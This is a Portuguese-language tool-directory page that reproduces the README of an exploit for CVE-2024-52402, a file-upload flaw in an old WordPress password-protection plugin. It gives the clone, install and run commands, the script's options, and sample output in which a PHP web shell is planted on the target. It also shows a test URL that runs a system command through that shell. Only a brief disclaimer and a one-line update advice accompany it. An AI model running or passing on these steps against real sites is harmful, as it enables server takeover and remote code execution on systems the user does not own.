Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/nxploited/cve-2024-52402
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubnxploited/cve-2024-52402

CVE-2024-52402

Plugin WordPress Exclusive Content Password Protect <= 1.1.0 - vulnerabilidade de CSRF para Arbitrary File Upload

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚀 Exploit para CVE-2024-52402: Plugin WordPress Exclusive Content Password Protect <= 1.1.0

🛡️ Visão Geral

Este exploit visa uma vulnerabilidade de Cross-Site Request Forgery (CSRF) no plugin WordPress Exclusive Content Password Protect, versões até e incluindo 1.1.0. Esta vulnerabilidade permite que um atacante faça upload de um web shell para o servidor web, levando a potencial execução remota de código.

📅 Detalhes

  • Publicado em: 2024-11-19
  • ID CVE: CVE-2024-52402
  • Versão do Plugin: Exclusive Content Password Protect <= 1.1.0
  • Gravidade: CRÍTICA (CVSS 9.6)

⚙️ Uso

Para explorar esta vulnerabilidade, você precisa fornecer a URL do site WordPress alvo, um nome de usuário e senha válidos do WordPress. O script de exploit fará login no site WordPress e tentará fazer upload de um web shell.

🔧 Comando

root@kitploit:~
python CVE-2024-52402.py -u <target> -un <username> -p <password>

🛠️ Opções

root@kitploit:~
usage: CVE-2024-52402.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit for ECVE-2024-52402 By | Nxploit, Khaled ALenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress site URL
  -un, --username USERNAME
                        WordPress username
  -p, --password PASSWORD
                        WordPress password

🌟 Exemplo

root@kitploit:~
python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin

🚀 Exemplo de Saída

root@kitploit:~
[+] Plugin version detected: 1.1.0
[+] Logged in successfully.
[!] Exploit completed! Web Shell uploaded: http://target/wordpress/wp-content/uploads/nxploit.php
[*] Test with: http://target/wordpress/wp-content/uploads/nxploit.php?cmd=whoami

📜 Descrição

Este script explora a vulnerabilidade CSRF no plugin Exclusive Content Password Protect para fazer upload de um Web Shell para o servidor WordPress. No entanto, ele não executa um ataque CSRF diretamente; em vez disso, foca em alavancar a funcionalidade de upload de arquivos do plugin para alcançar a exploração.

👨‍💻 Como Executar o Script

  1. Clone o Repositório

    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-52402.git
    cd CVE-2024-52402
    
  2. Instale os Requisitos Certifique-se de ter a biblioteca requests instalada:

    root@kitploit:~
    pip install requests
    
  3. Execute o Script Use o seguinte comando para executar o script:

    root@kitploit:~
    python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin
    

🛡️ Mitigação

Para mitigar esta vulnerabilidade, atualize o plugin Exclusive Content Password Protect para a versão mais recente onde este problema foi corrigido.

⚠️ Aviso Legal

Este script destina-se apenas a fins educacionais. O uso não autorizado deste script contra sistemas para os quais você não tem permissão explícita para testar é ilegal e antiético.

Exploit por: Nxploit, Khaled alenazi.

Baixar ferramenta